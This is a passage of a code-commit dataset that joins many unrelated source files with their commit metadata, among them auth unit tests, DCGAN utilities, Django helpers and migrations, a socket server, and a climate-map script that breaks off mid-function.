# noinspection PyUnresolvedReferences
class TestAuth(TestCase):
    """Unit tests for the Auth controller: the underlying RestClient verbs
    are replaced with MagicMocks returning canned API responses, so only
    request construction and response parsing are exercised."""
    def setUp(self):
        # Client never hits the network — post/put are mocked per test.
        self.client = RestClient("http://test", "test", "test")
        self.auth = Auth(self.client)
        self.sms_init_response = {
            "method": "sms",
            "auth_id": "auth_id"
        }
        self.totp_init_response = {
            "method": "totp"
        }
        self.verified_response = {
            "verified": True
        }
        self.failed_response = {
            "verified": False,
            "status": {
                "throttled": False,
                "expired": False,
                "invalid": True,
                "result": "INVALID"
            },
        }
    def test_initiate_sms(self):
        """SMS initiation POSTs {"method": "sms"} and returns the auth_id."""
        self.client.post = MagicMock(return_value=self.sms_init_response)
        res = self.auth.initiate("sid", "uid", self.auth.METHOD_SMS)
        self.client.post.assert_called_with(routes.AUTH_INITIATE.format("sid", "uid"),
                                            json={"method": "sms"})
        self.assertEqual(res, self.sms_init_response['auth_id'])
    def test_initiate_totp(self):
        """TOTP initiation POSTs {"method": "totp"}; no auth_id is returned."""
        self.client.post = MagicMock(return_value=self.totp_init_response)
        res = self.auth.initiate("sid", "uid", self.auth.METHOD_TOTP)
        self.client.post.assert_called_with(routes.AUTH_INITIATE.format("sid", "uid"),
                                            json={"method": "totp"})
        self.assertIsNone(res)
    def test_verify_sms(self):
        """SMS verification PUTs token + auth_id and reports success."""
        self.client.put = MagicMock(return_value=self.verified_response)
        verified, error = self.auth.verify("sid", "uid", self.auth.METHOD_SMS, "token", "auth_id")
        self.client.put.assert_called_with(routes.AUTH_VERIFY.format("sid", "uid"),
                                           json={"method": "sms", "token": "token", "auth_id": "auth_id"})
        self.assertTrue(verified)
    def test_verify_totp(self):
        """TOTP verification PUTs only the token and reports success."""
        self.client.put = MagicMock(return_value=self.verified_response)
        verified, error = self.auth.verify("sid", "uid", self.auth.METHOD_TOTP, "token")
        self.client.put.assert_called_with(routes.AUTH_VERIFY.format("sid", "uid"),
                                           json={"method": "totp", "token": "token"})
        self.assertTrue(verified)
    def test_verify_failed(self):
        """A failed verification response yields verified == False."""
        self.client.put = MagicMock(return_value=self.failed_response)
        verified, error = self.auth.verify("sid", "uid", self.auth.METHOD_TOTP, "token")
        self.client.put.assert_called_with(routes.AUTH_VERIFY.format("sid", "uid"),
                                           json={"method": "totp", "token": "token"})
        self.assertFalse(verified)
| apache-2.0 | Python | |
3d32b633904316b077c5d3c3b3444154785f9fd3 | Create utils.py | ChunML/DCGAN | utils.py | utils.py | import math
import numpy as np
import tensorflow as tf
import scipy
from tensorflow.python.framework import ops
# Compatibility aliases: the short pre-TF1 summary names used elsewhere in
# the codebase, mapped onto the tf.summary API.
image_summary = tf.summary.image
scalar_summary = tf.summary.scalar
histogram_summary = tf.summary.histogram
merge_summary = tf.summary.merge
SummaryWriter = tf.summary.FileWriter
class batch_norm(object):
    """Callable wrapper around tf.contrib.layers.batch_norm so a layer's
    normalization parameters live under a fixed variable scope and can be
    reused across calls (TF1 graph-mode idiom)."""
    def __init__(self, epsilon=1e-5, momentum=0.9, name='batch_norm'):
        # The scope is entered only to reserve the name; parameters are
        # created lazily on the first __call__ via `scope=self.name`.
        with tf.variable_scope(name):
            self.epsilon = epsilon      # numerical-stability constant
            self.momentum = momentum    # decay for the moving averages
            self.name = name
    def __call__(self, x, train=True):
        # updates_collections=None forces moving-average updates in place.
        return tf.contrib.layers.batch_norm(x,
                                            decay=self.momentum,
                                            updates_collections=None,
                                            epsilon=self.epsilon,
                                            scale=True,
                                            is_training=train,
                                            scope=self.name)
def conv2d(input_, output_dim, k_h=5, k_w=5, d_h=2, d_w=2, stddev=0.02, name='conv2d'):
    """2-D convolution with bias: k_h x k_w kernel, (d_h, d_w) strides,
    SAME padding. Weights are truncated-normal initialized and live under
    the variable scope `name` so the layer is reusable."""
    with tf.variable_scope(name):
        w = tf.get_variable('w', [k_h, k_w, input_.get_shape()[-1], output_dim],
                            initializer=tf.truncated_normal_initializer(stddev=stddev))
        conv = tf.nn.conv2d(input_, w, strides=[1, d_h, d_w, 1], padding='SAME')
        biases = tf.get_variable('biases', [output_dim], initializer=tf.constant_initializer(0.))
        # reshape restores the static shape lost by bias_add.
        conv = tf.reshape(tf.nn.bias_add(conv, biases), conv.get_shape())
        return conv
def deconv2d(input_, output_shape, k_h=5, k_w=5, d_h=2, d_w=2, stddev=0.02, name='deconv2d', with_w=False):
    """Transposed 2-D convolution ("deconvolution") producing `output_shape`.

    Returns the output tensor, or (output, weights, biases) if with_w is
    True (callers use the extras for e.g. weight visualization).
    """
    with tf.variable_scope(name):
        # Note the transposed filter layout: [k_h, k_w, out_ch, in_ch].
        w = tf.get_variable('w', [k_h, k_w, output_shape[-1], input_.get_shape()[-1]],
                            initializer=tf.random_normal_initializer(stddev=stddev))
        deconv = tf.nn.conv2d_transpose(input_, w, output_shape=output_shape,
                                        strides=[1, d_h, d_w, 1])
        biases = tf.get_variable('biases', [output_shape[-1]], initializer=tf.constant_initializer(0.))
        deconv = tf.reshape(tf.nn.bias_add(deconv, biases), deconv.get_shape())
        if with_w:
            return deconv, w, biases
        else:
            return deconv
def lrelu(x, leak=0.2, name='lrelu'):
    """Leaky ReLU: elementwise max(x, leak * x).

    `name` is accepted for signature compatibility with the other layer
    helpers but is not used (no variables are created).
    """
    return tf.maximum(leak * x, x)
def linear(input_, output_size, scope=None, stddev=0.02, bias_start=0., with_w=False):
    """Fully-connected layer: input_ @ Matrix + bias.

    Expects a rank-2 input (shape[1] is the feature size). Returns the
    output, or (output, Matrix, bias) when with_w is True.
    """
    shape = input_.get_shape().as_list()
    with tf.variable_scope(scope or 'Linear'):
        matrix = tf.get_variable('Matrix', [shape[1], output_size], tf.float32, tf.random_normal_initializer(stddev=stddev))
        bias = tf.get_variable('bias', [output_size], initializer=tf.constant_initializer(bias_start))
        if with_w:
            return tf.matmul(input_, matrix) + bias, matrix, bias
        else:
            return tf.matmul(input_, matrix) + bias
def save_images(images, size, image_path):
    """Rescale generator output from [-1, 1] to [0, 1], tile it into a
    (size[0] x size[1]) grid, and write it to image_path."""
    return imsave(inverse_transform(images), size, image_path)
def inverse_transform(images):
    """Map images from tanh range [-1, 1] back to display range [0, 1]."""
    shifted = images + 1.
    return shifted / 2.
def imsave(images, size, path):
    """Tile `images` into one grid image and save it to `path`.

    squeeze drops the channel axis for single-channel grids.
    NOTE(review): scipy.misc.imsave was removed in SciPy 1.2 — this relies
    on an old SciPy pin; confirm before upgrading.
    """
    image = np.squeeze(merge(images, size))
    return scipy.misc.imsave(path, image)
def merge(images, size):
    """Tile a batch of images into a single image grid.

    Args:
        images: array of shape (batch, h, w, c) with c in {1, 3, 4}.
        size: (rows, cols) of the grid; images fill it row-major.

    Returns:
        (h*rows, w*cols, c) array for 3/4-channel input, or
        (h*rows, w*cols) for single-channel input.

    Raises:
        ValueError: for any other channel count (the previous version fell
        through and silently returned None, crashing later in imsave).
    """
    h, w = images.shape[1], images.shape[2]
    c = images.shape[3]
    if c in (3, 4):
        img = np.zeros((h * size[0], w * size[1], c))
        for idx, image in enumerate(images):
            i = idx % size[1]   # column
            j = idx // size[1]  # row
            img[j*h:(j+1)*h, i*w:(i+1)*w, :] = image
        return img
    if c == 1:
        img = np.zeros((h * size[0], w * size[1]))
        for idx, image in enumerate(images):
            i = idx % size[1]
            j = idx // size[1]
            img[j*h:(j+1)*h, i*w:(i+1)*w] = image[:, :, 0]
        return img
    raise ValueError('merge() expects images with 1, 3 or 4 channels, got %d' % c)
| mit | Python | |
464d55d687a664a5ed7da4f7ddafce1f647d5efc | add templation url.templation_static to manage statics in dev stage | qdqmedia/django-templation,qdqmedia/django-templation,qdqmedia/django-templation | templation/urls.py | templation/urls.py | from django.conf.urls import patterns, url
from .settings import DAV_ROOT, DAV_STATIC_URL
from .views import static_view
def templation_static(**kwargs):
    """Return URL patterns serving DAV-stored resource files in development.

    Mostly cloned from django.conf.urls.static(). Usage::

        from templation.urls import templation_static

        urlpatterns = patterns('',
            # ... the rest of your URLconf goes here ...
        ) + templation_static(**kwargs)

    Extra kwargs are forwarded to the view; document_root is always forced
    to DAV_ROOT.
    """
    kwargs.update({
        'document_root': DAV_ROOT
    })
    # URL shape: <DAV_STATIC_URL>/<resource_id>/<path>
    return patterns('',
        url(r'{}/(?P<resource_id>.*)/(?P<path>.*)$'.format(DAV_STATIC_URL.lstrip('/')),
            static_view, kwargs=kwargs),
    )
89daaaf631258595577dfc1c24dfdde8425f9efc | add migration | neynt/tsundiary,neynt/tsundiary,neynt/tsundiary,neynt/tsundiary | migrations/versions/2d696cdd68df_.py | migrations/versions/2d696cdd68df_.py | """empty message
Revision ID: 2d696cdd68df
Revises: 388d0cc48e7c
Create Date: 2014-11-14 00:27:32.062569
"""
# revision identifiers, used by Alembic.
revision = '2d696cdd68df'
down_revision = '388d0cc48e7c'
from alembic import op
import sqlalchemy as sa
def upgrade():
    """Empty auto-generated Alembic revision: no schema changes to apply."""
    ### commands auto generated by Alembic - please adjust! ###
    pass
    ### end Alembic commands ###
def downgrade():
    """Empty auto-generated Alembic revision: nothing to revert."""
    ### commands auto generated by Alembic - please adjust! ###
    pass
    ### end Alembic commands ###
| mit | Python | |
c779a68f1cf97693e09f116237c38efa1d791186 | add a module working with http connections | alces/gitlab-rest-client | http.py | http.py | '''
working with HTTP requests & responces
'''
import config
import httplib
import urlparse
'''
make a connection to URL
'''
def mkConn(url):
    """Return an (unopened) httplib connection to url's host, choosing
    HTTPSConnection for https and HTTPConnection otherwise (Python 2)."""
    pars = urlparse.urlparse(url)
    # Py2 and-or ternary: https -> HTTPSConnection, else HTTPConnection.
    conCls = pars.scheme == 'https' and httplib.HTTPSConnection or httplib.HTTPConnection
    return conCls(pars.netloc)
'''
send request to a system and return a response
'''
def sendReq(nam, path, meth = 'GET', body = ''):
    """Send a GitLab API v3 request to the system named `nam` (URL and
    private token come from the config module) and return the response.

    NOTE(review): the request target is built as '<full url>/api/v3/<path>',
    i.e. an absolute URI rather than a path — works against GitLab here,
    but confirm if pointing at a different server/proxy.
    """
    url = config.getURL(nam)
    cn = mkConn(url)
    cn.request(meth, '%s/api/v3/%s' % (url, path), body, {
        'PRIVATE-TOKEN': config.getToken(nam)
    })
    return cn.getresponse()
| bsd-2-clause | Python | |
bcd2cdae3176dddca06b0e09774b7c9cd641ce7b | Define custom exceptions | footynews/fn_backend | aggregator/exceptions.py | aggregator/exceptions.py |
class WebCrawlException(Exception):
    """Base class for errors raised while crawling article pages."""


class AuthorNotFoundException(WebCrawlException):
    """Raised when the article author cannot be extracted from a page."""


class DatePublishedNotFoundException(WebCrawlException):
    """Raised when the publication date cannot be extracted from a page."""


class TitleNotFoundException(WebCrawlException):
    """Raised when the article title cannot be extracted from a page."""
| apache-2.0 | Python | |
06dbbfd7a8876f7db14f80e13d45eacd369501ab | add SocketServer | aamalev/aioworkers,aioworkers/aioworkers | aioworkers/net/server.py | aioworkers/net/server.py | import socket
from ..core.base import LoggingEntity
class SocketServer(LoggingEntity):
    """Entity that opens listening TCP sockets described by its config.

    If the config has a `port` (and optional `host`), one socket is bound
    during set_config and kept in self._sockets.
    """
    def __init__(self, *args, **kwargs):
        # Sockets must exist before super().__init__, which may trigger
        # set_config and hence bind().
        self._sockets = []
        super().__init__(*args, **kwargs)
    def set_config(self, config):
        super().set_config(config)
        # null=True: a missing port means "don't listen".
        port = self.config.get_int('port', null=True)
        if port:
            host = self.config.get('host')
            self._sockets.append(self.bind(port, host))
    def bind(self, port, host=None, backlog=128):
        """Create, bind and return a non-blocking listening TCP socket
        on (host or 0.0.0.0, port)."""
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        # Allow quick rebinds after restart (avoid TIME_WAIT failures).
        sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, True)
        host = host or '0.0.0.0'
        self.logger.info('Bind to %s:%s', host, port)
        sock.bind((host, port))
        # Non-blocking: the socket is meant to be driven by an event loop.
        sock.setblocking(False)
        sock.listen(backlog)
        return sock
| apache-2.0 | Python | |
de250e5e63e4b0a36d06f8187644f91157265218 | Remove Privacy stubs | harry-7/Plinth,kkampardi/Plinth,vignanl/Plinth,harry-7/Plinth,jvalleroy/plinth-debian,freedomboxtwh/Plinth,freedomboxtwh/Plinth,harry-7/Plinth,kkampardi/Plinth,harry-7/Plinth,freedomboxtwh/Plinth,jvalleroy/plinth-debian,jvalleroy/plinth-debian,vignanl/Plinth,vignanl/Plinth,jvalleroy/plinth-debian,harry-7/Plinth,vignanl/Plinth,jvalleroy/plinth-debian,vignanl/Plinth,kkampardi/Plinth,freedomboxtwh/Plinth,kkampardi/Plinth,kkampardi/Plinth,freedomboxtwh/Plinth | modules/installed/privacy/privacy.py | modules/installed/privacy/privacy.py | import cherrypy
from gettext import gettext as _
from plugin_mount import PagePlugin
from modules.auth import require
import cfg
import util
class Privacy(PagePlugin):
    """Plinth page plugin: registers the /privacy page and its menu entry,
    serving the privacy configuration template."""
    order = 20 # order of running init in PagePlugins
    def __init__(self, *args, **kwargs):
        PagePlugin.__init__(self, *args, **kwargs)
        self.register_page("privacy")
        # (label, icon, url, weight) in the main menu.
        self.menu = cfg.main_menu.add_item("Privacy", "icon-eye-open", "/privacy", 12)
    @cherrypy.expose
    def index(self):
        """Render the privacy control panel page."""
        return util.render_template(template='privacy_config',
                                    title=_('Privacy Control Panel'))
| import cherrypy
from gettext import gettext as _
from plugin_mount import PagePlugin
from modules.auth import require
import cfg
import util
class Privacy(PagePlugin):
order = 20 # order of running init in PagePlugins
def __init__(self, *args, **kwargs):
PagePlugin.__init__(self, *args, **kwargs)
self.register_page("privacy")
self.menu = cfg.main_menu.add_item("Privacy", "icon-eye-open", "/privacy", 12)
self.menu.add_item("General Config", "icon-asterisk", "/privacy/config", 10)
self.menu.add_item("Ad Blocking", "icon-ban-circle", "/privacy/adblock", 20)
self.menu.add_item("HTTPS Everywhere", "icon-lock", "/privacy/https_everywhere", 30)
@cherrypy.expose
def index(self):
#raise cherrypy.InternalRedirect('/privacy/config')
return self.config()
@cherrypy.expose
@require()
def config(self):
return util.render_template(template='privacy_config',
title=_('Privacy Control Panel'))
| agpl-3.0 | Python |
2ed36e44c80e4b2d059c77fcda741656200f9876 | Add tests/test-muc-invitation.py [re-recorded] | community-ssu/telepathy-gabble,Ziemin/telepathy-gabble,jku/telepathy-gabble,mlundblad/telepathy-gabble,mlundblad/telepathy-gabble,Ziemin/telepathy-gabble,mlundblad/telepathy-gabble,community-ssu/telepathy-gabble,jku/telepathy-gabble,jku/telepathy-gabble,community-ssu/telepathy-gabble,community-ssu/telepathy-gabble,Ziemin/telepathy-gabble,Ziemin/telepathy-gabble | tests/test-muc-invitation.py | tests/test-muc-invitation.py | """
Test MUC invitations.
"""
import dbus
from twisted.words.xish import domish, xpath
from gabbletest import go, make_result_iq
from servicetest import call_async, lazy, match
@match('dbus-signal', signal='StatusChanged', args=[0, 1])
def expect_connected(event, data):
# Bob has invited us to an activity.
message = domish.Element((None, 'message'))
message['from'] = 'chat@conf.localhost'
message['to'] = 'test@localhost'
x = message.addElement(('http://jabber.org/protocol/muc#user', 'x'))
invite = x.addElement((None, 'invite'))
invite['from'] = 'bob@localhost'
reason = invite.addElement((None, 'reason'))
reason.addContent('No good reason')
data['stream'].send(message)
return True
@match('dbus-signal', signal='NewChannel')
def expect_text_channel(event, data):
if event.args[1] != 'org.freedesktop.Telepathy.Channel.Type.Text':
return False
assert event.args[2] == 2 # handle type
assert event.args[3] == 1 # handle
data['room_handle'] = 1
bus = data['conn']._bus
data['text_chan'] = bus.get_object(
data['conn'].bus_name, event.args[0])
data['group_iface'] = dbus.Interface(data['text_chan'],
'org.freedesktop.Telepathy.Channel.Interface.Group')
members = data['group_iface'].GetAllMembers()[0]
local_pending = data['group_iface'].GetAllMembers()[1]
remote_pending = data['group_iface'].GetAllMembers()[2]
assert len(members) == 1
assert data['conn_iface'].InspectHandles(1, members)[0] == 'bob@localhost'
data['bob_handle'] = members[0]
assert len(local_pending) == 1
# FIXME: the username-part-is-nickname assumption
assert data['conn_iface'].InspectHandles(1, local_pending)[0] == \
'chat@conf.localhost/test'
assert len(remote_pending) == 0
data['room_self_handle'] = data['group_iface'].GetSelfHandle()
assert data['room_self_handle'] == local_pending[0]
# accept the invitation
call_async(data['test'], data['group_iface'], 'AddMembers',
[data['room_self_handle']], 'Oh, OK then')
return True
@match('dbus-signal', signal='MembersChanged')
def expect_add_myself_into_remote_pending(event, data):
assert event.args == ['', [], [data['bob_handle']], [],
[data['room_self_handle']], 0,
data['room_self_handle']]
return True
@match('dbus-return', method='AddMembers')
def expect_add_myself_success(event, data):
return True
@match('stream-presence', to='chat@conf.localhost/test')
def expect_presence(event, data):
# Send presence for own membership of room.
presence = domish.Element((None, 'presence'))
presence['from'] = 'chat@conf.localhost/test'
x = presence.addElement(('http://jabber.org/protocol/muc#user', 'x'))
item = x.addElement('item')
item['affiliation'] = 'owner'
item['role'] = 'moderator'
data['stream'].send(presence)
return True
@match('dbus-signal', signal='MembersChanged')
def expect_members_changed2(event, data):
assert event.args == ['', [data['room_self_handle']], [], [],
[], 0, 0]
# Test sending an invitation
data['alice_handle'] = data['conn_iface'].RequestHandles(1,
['alice@localhost'])[0]
call_async(data['test'], data['group_iface'], 'AddMembers',
[data['alice_handle']], 'I want to test invitations')
return True
@match('stream-message')
def expect_invitation(event, data):
message = event.stanza
if message['to'] != 'chat@conf.localhost':
return False
x = xpath.queryForNodes('/message/x', message)
assert (x is not None and len(x) == 1), repr(x)
assert x[0].uri == 'http://jabber.org/protocol/muc#user'
invites = xpath.queryForNodes('/x/invite', x[0])
assert (invites is not None and len(invites) == 1), repr(invites)
assert invites[0]['to'] == 'alice@localhost'
reasons = xpath.queryForNodes('/invite/reason', invites[0])
assert (reasons is not None and len(reasons) == 1), repr(reasons)
assert str(reasons[0]) == 'I want to test invitations'
data['conn_iface'].Disconnect()
return True
@match('dbus-signal', signal='StatusChanged', args=[2, 1])
def expect_disconnected(event, data):
return True
if __name__ == '__main__':
go()
| lgpl-2.1 | Python | |
e6501592303e2345e1262177a11f96e91f371024 | Add a state reading all about the room of a selected entity | WalkingMachine/sara_behaviors,WalkingMachine/sara_behaviors | sara_flexbe_states/src/sara_flexbe_states/Wonderland_Get_Entity_Room.py | sara_flexbe_states/src/sara_flexbe_states/Wonderland_Get_Entity_Room.py | #!/usr/bin/env python
# encoding=utf8
from flexbe_core import EventState, Logger
import json
class Wonderland_Get_Entity_Room(EventState):
'''
Read the position of a room in a json string
-- index_function function index of the
># json_text string command to read
># input_value object Input to the index function.
#< id int id of the room
#< name string name of the room
#< x1 int position of the room
#< x2 int position of the room
#< x3 int position of the room
#< x4 int position of the room
#< y1 int position of the room
#< y2 int position of the room
#< y3 int position of the room
#< y4 int position of the room
<= done return when at least one entity exist
<= no_room return when no entity have the selected name
<= error return when error reading data
'''
def __init__(self, index_function):
# See example_state.py for basic explanations.
super(Wonderland_Get_Entity_Room, self).__init__(outcomes=['done', 'no_room', 'error'],
input_keys=['json_text', 'input_value'],
output_keys=['id','name','x1','x2','x3','x4','y1','y2','y3','y4'])
self._index_function = index_function
self._index = 0
def execute(self, userdata):
# parse parameter json data
data = json.loads(userdata.json_text)
# read if there is data
if not data[self._index]:
# continue to Zero
return 'no_room'
# try to read data
if 'id' not in data[self._index]['room']:
# continue to Error
return 'error'
if 'room_name' not in data[self._index]['room']:
# continue to Error
return 'error'
if 'x1' not in data[self._index]['room']:
# continue to Error
return 'error'
if 'x2' not in data[self._index]['room']:
# continue to Error
return 'error'
if 'x3' not in data[self._index]['room']:
# continue to Error
return 'error'
if 'x4' not in data[self._index]['room']:
# continue to Error
return 'error'
if 'y1' not in data[self._index]['room']:
# continue to Error
return 'error'
if 'y2' not in data[self._index]['room']:
# continue to Error
return 'error'
if 'y3' not in data[self._index]['room']:
# continue to Error
return 'error'
if 'y4' not in data[self._index]['room']:
# continue to Error
return 'error'
# write return datas
userdata.id = data[self._index]['room']['id']
userdata.name = data[self._index]['room']['room_name']
userdata.x1 = data[self._index]['room']['x1']
userdata.x2 = data[self._index]['room']['x2']
userdata.x3 = data[self._index]['room']['x3']
userdata.x4 = data[self._index]['room']['x4']
userdata.y1 = data[self._index]['room']['y1']
userdata.y2 = data[self._index]['room']['y2']
userdata.y3 = data[self._index]['room']['y3']
userdata.y4 = data[self._index]['room']['y4']
print data[self._index]['room']['id']
print data[self._index]['room']['room_name']
print data[self._index]['room']['x1']
print data[self._index]['room']['x2']
print data[self._index]['room']['x3']
print data[self._index]['room']['x4']
print data[self._index]['room']['y1']
print data[self._index]['room']['y2']
print data[self._index]['room']['y3']
print data[self._index]['room']['y4']
# continue to Done
return 'done'
def on_enter(self, userdata):
if self._index_function is not None:
try:
self._index = self._index_function(userdata.input_value)
except Exception as e:
Logger.logwarn('Failed to execute index function!\n%s' % str(e)) | bsd-3-clause | Python | |
d813f07e85b070e7ad60e8d9102ff148cc4734b8 | Create index.py | datts68/maas | SourceCode/index.py | SourceCode/index.py | #
| apache-2.0 | Python | |
dab9a2a596151b6fb2127319cacf264cfa7ae4f2 | add an example | jswinarton/django-cerebral-forms | examples/example.py | examples/example.py | import django
from django.conf import settings
from cerebral import forms
settings.configure()
django.setup()
class ExampleForm(forms.Form):
first_name = forms.CharField(
fill=True, hide=False, requires=[])
last_name = forms.CharField(
fill=True, hide=False, requires=[])
email = forms.CharField(
fill=True, hide=False, requires=[])
job_title = forms.CharField(
hide=True, requires=['email'])
annual_ad_budget = forms.CharField(
hide=True, requires=['job_title'])
comments = forms.CharField(
fill=False, hide=False, requires=[])
# Data passed to the cerebellum can be from any external source
# that collects user data, such as a database or a CRM like SalesForce.
cerebellum = {
'first_name': 'Jeremy',
'last_name': 'Swinarton',
'email': 'jeremy@swinarton.com',
}
form = ExampleForm(cerebellum=cerebellum)
form.fields.keys()
# ['first_name', 'last_name', 'email', 'job_title', 'comments']
form.initial
# {'first_name': 'Jeremy', 'last_name': 'Swinarton', 'email': 'jeremy@swinarton.com'}
# Let's submit some user data to the form and validate it.
bound_form = ExampleForm({
'first_name': 'Jeremy',
'last_name': 'Swinarton',
'email': 'jeremy@swinarton.com',
'job_title': 'Web Developer',
'comments': 'Hi!',
}, cerebellum=cerebellum)
bound_form.is_valid() # True
# In this example, we've submitted and validated the form, and added its data
# back to our database. Let's create the form again with a new cerebellum.
# This time, the job_title field will be hidden, and we'll be shown the
# annual_ad_budget_field instead.
cerebellum = bound_form.data
progressive_form = ExampleForm(cerebellum=cerebellum)
progressive_form.fields.keys()
# ['first_name', 'last_name', 'email', 'annual_ad_budget', 'comments']
progressive_form.initial
# {'first_name': 'Jeremy', 'last_name': 'Swinarton', 'email': 'jeremy@swinarton.com'}
| mit | Python | |
21bee0c5b92d03a4803baf237c460223308ebb9f | Add a fake source code so you can embed it in the example | MetaPlot/MetaPlot | examples/fakecode.py | examples/fakecode.py | # Get the hash
# 01/07/2017
# Melissa Hoffman
# Get the current repo
import os
import subprocess
testdir='/Users/melissahoffman1/'
repo = testdir
# Check if the repo is a git repo and get githash
def get_git_hash(path):
os.chdir(path)
try:
sha = subprocess.check_output(['git','rev-parse','HEAD'],shell=False).strip()
except subprocess.CalledProcessError as e:
print("ERROR, not a git repository")
return {}
return sha
githash = get_git_hash(repo)
#print(githash)
k = githash
#print(type(k))
v = 'git hash'
#print {k:v}
| mit | Python | |
077170874e3a08825e00f2b3cba68cc8f6e987ce | Prepare v1.2.509.dev | oxc/Flexget,qk4l/Flexget,crawln45/Flexget,sean797/Flexget,tobinjt/Flexget,LynxyssCZ/Flexget,malkavi/Flexget,oxc/Flexget,JorisDeRieck/Flexget,JorisDeRieck/Flexget,LynxyssCZ/Flexget,sean797/Flexget,poulpito/Flexget,tarzasai/Flexget,jacobmetrick/Flexget,gazpachoking/Flexget,poulpito/Flexget,dsemi/Flexget,Danfocus/Flexget,jawilson/Flexget,ianstalk/Flexget,Danfocus/Flexget,oxc/Flexget,OmgOhnoes/Flexget,jacobmetrick/Flexget,malkavi/Flexget,qvazzler/Flexget,gazpachoking/Flexget,dsemi/Flexget,OmgOhnoes/Flexget,tobinjt/Flexget,JorisDeRieck/Flexget,qk4l/Flexget,jawilson/Flexget,LynxyssCZ/Flexget,Danfocus/Flexget,tarzasai/Flexget,tobinjt/Flexget,drwyrm/Flexget,OmgOhnoes/Flexget,malkavi/Flexget,poulpito/Flexget,qvazzler/Flexget,crawln45/Flexget,dsemi/Flexget,ianstalk/Flexget,LynxyssCZ/Flexget,jawilson/Flexget,malkavi/Flexget,drwyrm/Flexget,drwyrm/Flexget,Flexget/Flexget,Danfocus/Flexget,Flexget/Flexget,ianstalk/Flexget,jacobmetrick/Flexget,qvazzler/Flexget,jawilson/Flexget,sean797/Flexget,tobinjt/Flexget,Flexget/Flexget,qk4l/Flexget,JorisDeRieck/Flexget,crawln45/Flexget,Flexget/Flexget,crawln45/Flexget,tarzasai/Flexget | flexget/_version.py | flexget/_version.py | """
Current FlexGet version.
This is contained in a separate file so that it can be easily read by setup.py, and easily edited and committed by
release scripts in continuous integration. Should (almost) never be set manually.
The version should always be set to the <next release version>.dev
The jenkins release job will automatically strip the .dev for release,
and update the version again for continued development.
"""
__version__ = '1.2.509.dev'
| """
Current FlexGet version.
This is contained in a separate file so that it can be easily read by setup.py, and easily edited and committed by
release scripts in continuous integration. Should (almost) never be set manually.
The version should always be set to the <next release version>.dev
The jenkins release job will automatically strip the .dev for release,
and update the version again for continued development.
"""
__version__ = '1.2.508'
| mit | Python |
210f9c6acefdf2f51d33baa1ed7a2c131729fb93 | Update migrations to use lms.yml in the help text | stvstnfrd/edx-platform,eduNEXT/edx-platform,angelapper/edx-platform,angelapper/edx-platform,EDUlib/edx-platform,eduNEXT/edx-platform,arbrandes/edx-platform,edx/edx-platform,arbrandes/edx-platform,eduNEXT/edx-platform,arbrandes/edx-platform,stvstnfrd/edx-platform,eduNEXT/edunext-platform,angelapper/edx-platform,EDUlib/edx-platform,arbrandes/edx-platform,angelapper/edx-platform,stvstnfrd/edx-platform,EDUlib/edx-platform,eduNEXT/edunext-platform,eduNEXT/edunext-platform,eduNEXT/edunext-platform,EDUlib/edx-platform,edx/edx-platform,edx/edx-platform,edx/edx-platform,stvstnfrd/edx-platform,eduNEXT/edx-platform | common/djangoapps/third_party_auth/migrations/0004_auto_20200919_0955.py | common/djangoapps/third_party_auth/migrations/0004_auto_20200919_0955.py | # Generated by Django 2.2.16 on 2020-09-19 09:55
from django.db import migrations, models
import openedx.core.lib.hash_utils
class Migration(migrations.Migration):
dependencies = [
('third_party_auth', '0003_samlconfiguration_is_public'),
]
operations = [
migrations.AlterField(
model_name='ltiproviderconfig',
name='lti_consumer_secret',
field=models.CharField(blank=True, default=openedx.core.lib.hash_utils.create_hash256, help_text='The shared secret that the LTI Tool Consumer will use to authenticate requests. Only this edX instance and this tool consumer instance should know this value. For increased security, you can avoid storing this in your database by leaving this field blank and setting SOCIAL_AUTH_LTI_CONSUMER_SECRETS = {"consumer key": "secret", ...} in your instance\'s Django setttigs (or lms.yml)', max_length=255),
),
migrations.AlterField(
model_name='oauth2providerconfig',
name='secret',
field=models.TextField(blank=True, help_text='For increased security, you can avoid storing this in your database by leaving this field blank and setting SOCIAL_AUTH_OAUTH_SECRETS = {"(backend name)": "secret", ...} in your instance\'s Django settings (or lms.yml)', verbose_name='Client Secret'),
),
migrations.AlterField(
model_name='samlconfiguration',
name='private_key',
field=models.TextField(blank=True, help_text='To generate a key pair as two files, run "openssl req -new -x509 -days 3652 -nodes -out saml.crt -keyout saml.key". Paste the contents of saml.key here. For increased security, you can avoid storing this in your database by leaving this field blank and setting it via the SOCIAL_AUTH_SAML_SP_PRIVATE_KEY setting in your instance\'s Django settings (or lms.yml).'),
),
migrations.AlterField(
model_name='samlconfiguration',
name='public_key',
field=models.TextField(blank=True, help_text="Public key certificate. For increased security, you can avoid storing this in your database by leaving this field blank and setting it via the SOCIAL_AUTH_SAML_SP_PUBLIC_CERT setting in your instance's Django settings (or lms.yml)."),
),
]
| agpl-3.0 | Python | |
dc042aea1bb977984fb69a1da9c958f855d479ea | add util plot of precip cells | akrherz/idep,akrherz/dep,akrherz/dep,akrherz/dep,akrherz/idep,akrherz/idep,akrherz/idep,akrherz/dep,akrherz/dep,akrherz/idep,akrherz/idep | scripts/cligen/map_clifile_points.py | scripts/cligen/map_clifile_points.py | """Create a map of where we have climate files!"""
import psycopg2
import numpy as np
import os
import glob
from pyiem.plot import MapPlot
def get_domain():
pgconn = psycopg2.connect(database='idep', host='iemdb', user='nobody')
cursor = pgconn.cursor()
cursor.execute("""with ext as (
SELECT ST_Extent(ST_Transform(geom, 4326)) as e from huc12
WHERE scenario = 0)
SELECT st_xmin(ext.e), st_xmax(ext.e), st_ymin(ext.e), st_ymax(ext.e)
from ext""")
return np.array(cursor.fetchone())
def make_grid(extent):
x100 = [int(x) for x in (extent * 100.)]
nx = x100[1] - x100[0]
ny = x100[3] - x100[2]
return np.zeros((ny, nx))
def update_grid(extent, grid):
os.chdir("/i/0/cli")
for mydir in glob.glob("*"):
os.chdir(mydir)
for fn in glob.glob("*.cli"):
tokens = fn[:-4].split("x")
lon = 0 - float(tokens[0])
lat = float(tokens[1])
x = int((lon - extent[0]) * 100)
y = int((lat - extent[2]) * 100)
grid[y, x] = 1
os.chdir("..")
def draw_map(extent, grid):
a = np.sum(grid)
shp = grid.shape
b = shp[0] * shp[1]
c = float(a) / float(b) * 100.
m = MapPlot(sector='custom',
west=extent[0], east=extent[1], south=extent[2],
north=extent[3],
title='2 August 2016 :: DEP Precip Cells',
subtitle=('%.0f / %.0f %.2f%% Cells Currently Processed'
